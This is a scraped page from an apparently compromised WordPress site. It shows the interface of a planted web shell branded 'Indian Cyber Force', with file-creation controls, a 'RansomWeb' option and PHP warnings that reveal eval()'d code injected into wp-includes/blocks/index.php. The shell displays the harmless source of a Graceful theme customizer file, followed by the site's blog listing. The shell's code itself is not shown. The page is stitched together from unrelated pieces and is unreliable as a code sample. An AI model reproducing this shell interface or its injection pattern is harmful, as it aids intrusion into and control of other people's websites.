Warning: Constant WP_USE_THEMES already defined in css.zip#index.php on line 74
  • Home (current)
  • वर्तमान निदेशक => /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/
  • सूचना एवं अपलोड
    Info Server
Indian Cyber Force
Folders रचयन्तु सञ्चिकां रचयन्तु RansomWeb लॉगआउट

Warning: Undefined array key "बहिः गच्छतु" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 136

Warning: Undefined array key "aksi" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 140

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 159

Warning: Undefined array key "नामपत्र" in /www/wwwroot/wellwisehub.org/wp-includes/blocks/index.php(1) : eval()'d code on line 181
Current File : /www/wwwroot/wellwisehub.org/wp-content/themes/graceful/inc/customizer/theme-options/about.php
<?php
/**
 * Customizer About Pro Panel
 *
 * @package Graceful
 */

	// Pro Version
	class Graceful_Pro extends WP_Customize_Control {
		public $type = 'pro_options';

		public function render_content() {
			echo '<span class="dashicons dashicons-info"></span>';
			echo '<span> Want more <strong>'. esc_html( $this->label ) .'</strong>?</span>';
			echo '<a class="graceful-pro-link" href="'. esc_url( $this->description ) .'" target="_blank">';
				echo '<strong><i> '. esc_html__( 'Check Graceful PRO version.', 'graceful' ) .'</i><strong>';
			echo '</a>';
		}
	}

	// Pro Version Links
	class Graceful_Pro_Links extends WP_Customize_Control {
		public $type = 'pro_links';

		public function render_content() {
			?>
			<ul>
				<li class="customize-control">
					<h3><?php esc_html_e( 'Pro Version', 'graceful' ); ?></h3>
					<p><strong><?php esc_html_e( 'Upgrade to pro version for more customization options and Premium Support.', 'graceful' ); ?></strong></p>
					<a href="<?php echo esc_url('http://optimathemes.com/themes/graceful-pro?ref=graceful-customizer-buypro'); ?>" target="_blank" class="button button-primary widefat"><?php esc_html_e( 'Check Graceful Pro', 'graceful' ); ?></a>
				</li>
				<li class="customize-control">
					<h3><?php esc_html_e( 'Documentation and Demo', 'graceful' ); ?></h3>
					<a href="<?php echo esc_url('http://optimathemes.com/themes/graceful/docs/?ref=graceful-customizer-docs/'); ?>" target="_blank"><?php esc_html_e( 'Check Documentation', 'graceful' ); ?></a>
				</li>
				<li class="customize-control">
					<a href="<?php echo esc_url('http://optimathemes.com/themes/graceful/demo-content/?ref=graceful-customizer-demo/'); ?>" target="_blank"><?php esc_html_e( 'Check Demo Content', 'graceful' ); ?></a>
				</li>
			</ul>
			<?php
		}
	}

	// Add Colors section
	$wp_customize->add_section( 'graceful_pro' , array(
		'title'		 => esc_html__( 'About Graceful Pro', 'graceful' ),
		'priority'	 => 1,
		'capability' => 'edit_theme_options'
	) );

	// Pro Version
	$wp_customize->add_setting( 'pro_version_', array(
		'sanitize_callback' => 'graceful_sanitize_custom_controller'
	) );
	$wp_customize->add_control( new Graceful_Pro_Links ( $wp_customize,
			'pro_version_', array(
				'section'	=> 'graceful_pro',
				'type'		=> 'pro_links',
				'label' 	=> '',
				'priority'	=> 1
			)
		)
	);
wellwisehub – Page 6 Skip to content
wellwisehub

Latest Articles

  • Blog

    Effective Ways to Help Someone on Their Journey to Overcome Drug Addiction

  • Blog

    Duration of Oxycodone in Your System: Insights into Metabolism, Detection, and Withdrawal

  • Blog

    Struggling with Bedroom Performance? Here’s How to Improve

  • Blog

    Navigating Sobriety: The Advantages of Crafting a Recovery Plan

  • Blog

    Challenging Widespread Myths About Tea Drinking in Modern Times

  • Blog

    The Ultimate Resource for Achieving Glass Skin

  • Blog

    How CBD Can Support Smoking Cessation and Reduce Addiction

  • Blog

    Seeking Medical Guidance: 7 Essential Steps to Take After Asbestos Exposure

  • Blog

    Essential Factors Behind Alzheimer’s Disease You Should Be Aware Of

  • Blog

    Signs It’s Time to Explore Intensive Counseling

 Older Posts
Newer Posts 

Recent Posts

Recent Comments

Graceful Theme by Optima Themes